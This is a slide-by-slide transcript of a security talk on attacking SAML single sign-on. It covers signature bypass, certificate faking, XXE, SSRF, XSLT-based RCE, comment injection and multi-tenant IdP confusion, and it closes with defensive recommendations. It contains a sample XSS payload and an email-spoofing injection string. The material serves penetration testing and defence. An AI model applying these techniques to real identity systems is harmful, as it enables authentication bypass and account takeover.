OpenChain @ LF Japan Executive Briefing - May 2024OpenChain @ LF Japan Executive Briefing - May 2024
OpenChain @ LF Japan Executive Briefing - May 2024
 
Implementing KPIs and Right Metrics for Agile Delivery Teams.pdf
Implementing KPIs and Right Metrics for Agile Delivery Teams.pdfImplementing KPIs and Right Metrics for Agile Delivery Teams.pdf
Implementing KPIs and Right Metrics for Agile Delivery Teams.pdf
 

How to break SAML if I have paws?

  • 1. Суповой набор №5а. Как ломать SAML, если у меня лапки? How to hack SAML if I have paws? Aleksei “GreenDog” Tiurin
  • 2. WHOAMI? - Security researcher - Invicti Security (Acunetix) - Зеленые лапки расслабленности t.me/greenrelaxpaws agrrrdog.blogspot.com github.com/GrrrDog/ Aleksei Tiurin GreenDog
  • 3. SAML - Security Assertion Markup Language ● SSO ● Authentication and authorization ● Everywhere
  • 4. SAML - Security Assertion Markup Language ● Very old standards (~2002-2005) ○ SAML 1.0 / 2.0 ● Based on ○ HTTP ○ XML ○ XML Schema ○ XML Digital Signature (XML DSig) ○ XML Encryption ● Complicated standards ○ Protocols/Bindings/Profiles ○ Full specs - hundreds of pages
  • 5. “10 Years later” ● Old technologies -> old libs ○ xmlsec (java / c) ● Complex configurations ● Many Implementations https://en.wikipedia.org/wiki/SAML-based_products_and_services ● ZeroNights 2012 ● (almost) All the same attacks ^_^
  • 6. Identity Provider (IdP) - where user creds are stored - Okta, OneLogin, PingIdentity, MS AAD, etc - OpenAM, Keycloak, Oracle OAM, Shibboleth, etc Service Provider (SP) - an application that a user wants to access - … Jira, WordPress, AWS ...
  • 7. - One IdP - many SPs - Corporate SSO - One SP - many IdPs - SaaS that needs to support multiple organizations
  • 8. Flows - SP initiated - IdP initiated (from 4) SAML Request SAML Response
  • 9. SAMLRequest - From SP toIdP - Redirect Binding (GET) / POST Binding (HTML Form) - Base64
  • 10. SAMLResponse - From IdP to SP - POST Binding HTML form - Base64 + Deflate
  • 11. SAMLResponse - Signed Response - Signed Assertion - Both
  • 12. How does the signature work?
  • 13. Situations: - Anonymous attacks - A user in IdP - Malicious SP - Malicious IdP Core tool - SAML Raider extension in Burp
  • 14. Anonymous attacks 1. SAMLRequest - Detect that SAML is used 2. From SAMLRequest - Issuer (IdP) - AssertionConsumerServiceURL (ACS) - where SP expects SAMLResponse - SP’s SAML lib name - id generator - format, name, etc - Destination (IdP)
  • 15. SAML Metadata - Configuration exchange for SP and IdP - Names, endpoints, certificates… - Signature, encryption, additional attributes… SP doesn’t expose it (usually) IdP: - know endpoints - oamfed/idp/metadata - from Destination - okta.com/app/appname/RND/sso/saml-> - okta.com/app/RND/sso/saml/metadata Now, we have almost everything to create a good SAMLResponse from nothing
  • 16. Creating SAML Response - POST to ACS url - Known SAML schemas - Info from SAMLRequest - Destination - ACS url - InResponseTo - ID - Issue Timestamp - Issuer - From metadata - Both Response and Assertion - Subject / NameID - email? - Conditions - NotBefore + NotOnOrAfter - AudienceRestriction - ? - AuthnStatement - ? http://www.datypic.com/sc/saml2/e-samlp_Response.html http://www.datypic.com/sc/saml2/e-saml_Assertion.html
  • 17. 1. XML -> XXE (+XSD/NS injection?) - https://nvd.nist.gov/vuln/detail/CVE-2022-35741 2. XSS - Often show errors for debug - Before Sign check - Issuer, Destination, StatusCode, etc - using the created SAML Response - XSS payload -> every “field” - encode/CDATA Destination="&gt;&lt;img/src/onerror=alert(1)&gt;" SAML Response
  • 18. Authentication bypass - Disabled sign check - common misconfig - No <Signature/> tag - no Sign check https://hackerone.com/reports/136169 - Complicated specifications - - nobody uses advanced features - Documentation (SP/IdP)? - NameID - email - Find a registered email? - Auto provisioning - Create SAML Response(s) - Try them - Error messages https://mishresec.wordpress.com/2017/10/13/uber-bug-bounty-gaining-access-to-an-inter nal-chat-system/
  • 19. KeyInfo - Info about the key - ds:Signature - Self-Signed certificate SAML Response
  • 20. Certificate faking for Authentication bypass - Take Certificate from Metadata - Import in SAML Raider - Sign the created SAML Response(s) - Incorrect certificate match - Trust KeyInfo certificate https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#certificate-faking SAML Response
  • 21. Dupe Key Confusion (.NET) - Alvaro Muñoz, Oleksandr Mirosh at BlackHat 2019 https://i.blackhat.com/USA-19/Wednesday/us-19-Munoz-SSO-Wars-The-Token-Menace.pdf - Better with a valid SAML Response SAML Response
  • 22. Certificate validation to SSRF - Trust KeyInfo certificate - Certificate validation - SSRF in X509 cert - Michael Stepankin at BlackHat 2023 https://github.com/onhexgroup/Conferences/blob/main/Black%20Hat%20USA%202023%20slides/Michael %20Stepankin_mTLS%20When%20Certificate%20Authentication%20is%20Done%20Wrong.pdf - Java - AIA, SIA, CRL DP - Created SAML Response - Add KeyInfo with SSRF cert - Windows? .NET?
  • 23. Reference dereferencing - Data location - URI - remote files (http, https, etc) - local files - (Blind) SSRF - Everywhere! - XML DSig - XML Enc - Metadata - … SAML Response
  • 24. Reference dereferencing (XML DSig) - Reference https://github.com/IdentityPython/pysaml2/issues/510 - KeyInfo - Java xmlsec. SecureValidation bypass (CVE-2021-40690) https://blog.tint0.com/2021/09/pinging-xmlsec.html SAML Response
  • 25. Reference dereferencing (XML Enc) - CipherReference - DataReference - + EncryptedKey -> KeyInfo
  • 26. Transformations - XML “normalization” - Additional “preparations” - Base64 - XPath - XPath-Filter - XSLT (optional) - …
  • 27. Base64 http://www.w3.org/2000/09/xmldsig#base64 - .NET XXE CVE-2022-34716 - Decode Reference + Parse XML - XXE inside https://bugs.chromium.org/p/project-zero/issues/detail?id=2313
  • 28. XPath http://www.w3.org/TR/1999/REC-xpath-19991116 - Blind SSRF - Mix with Reference (xml files) - Error - Modified version of a payload for PingIdentity from https://blog.tint0.com/2021/09/pinging-xmlsec.html
  • 29. XSLT http://www.w3.org/TR/1999/REC-xslt-19991116 - Java / Santuario (xmlsec) <= 1.4.1 (~ 2010) - via Xalan - RCE ManageEngine ServiceDesk CVE-2022-47966
  • 30. xmlsec >= 1.4.2 - Secure-processing - true - Xalan CVE-2014-0107 < 2.7.2 - Arbitrary class instantiation https://blog.viettelcybersecurity.com/saml-show-stopper/
  • 32. How can we test dereference/transformations? - Acunetix - No manual tools - SAML Raider - no Algorithm - unparsed-text - XSLT 2.0 - it won’t detect CVE-2022-47966 (java xmlsec)
  • 33. Attacks on IdP - Signed SAMLRequest (AuthnRequest) - SP->IdP - Redirect-POST -> POST-POST bindings - SAML protocol: LogoutRequest, etc - Metadata import (Malicious SP/IdP) - Same attack vectors
  • 34. With creds / Malicious SP/IdP - Transformation after Sign check - Post-auth - “Malicious” SP/IdP - Generate a valid signature for arbitrary transformations - How? SAML Response
  • 35. More attacks on IdP (w/ creds) ACSSpoofing Attack - Change SAMLRequest ACS url to an attacker’ server - Old https://web-in-security.blogspot.com/2015/04/on-security-of-saml-based-identity.html - is it string or url comparison? XML injection - SAMLRequest is not signed - Values from SAMLRequest reflected in SAMLResponse - copy as string - add new tags/attributes - correctly signed https://research.nccgroup.com/2021/03/29/saml-xml-injection/
  • 36. Attacks on SP (w/ creds) - Sign check, Cert-related, etc - XSW (w/ SAML Raider) - XML parsing - Comment injection https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations - ~ 2017 - admin@victim.com<!---->.attacker.pw - admin@victim.com vs admin@victim.com.attacker.pw - <? anything ?> - processing instructions inside XML - Much more - Logic vulnerabilities - “how to put things together” - very common
  • 37. Session handling RelayState - State Preservation - URL - “Open Redirect” https://hackerone.com/reports/1923672 https://www.anitian.com/owning-saml/
  • 38. Multitenant (1 SP - many IdPs) Don’t trust IdP - Auth based on SAML Response - Manipulate NameId, Issuer, ACS - Email from another tenant -> access IdP confusion https://hackerone.com/reports/976603 - IdP victim - “IdP1” - IdP attacker - “IdP1 ” (with a space at the end) - Sign check w/ victim’s IdP, log in to the attacker’s account
  • 39. Recommendations - Don’t implement SAML “lib” yourself - Use 3rd party libs - Update libs systematically - Show a generic error - Disable unnecessary features - KeyInfo? XML Enc? - Be careful w/ metadata - Always pentest your SAML implementation in SP - Pentest your IdP if it’s not SaaS - Write me if you have any questions
  • 40. Big thanks to the researchers of mentioned articles/white papers/tools
  • 41. New cheat sheet about SAML? https://github.com/GrrrDog/ Зеленые лапки расслабленности https://t.me/greenrelaxpaws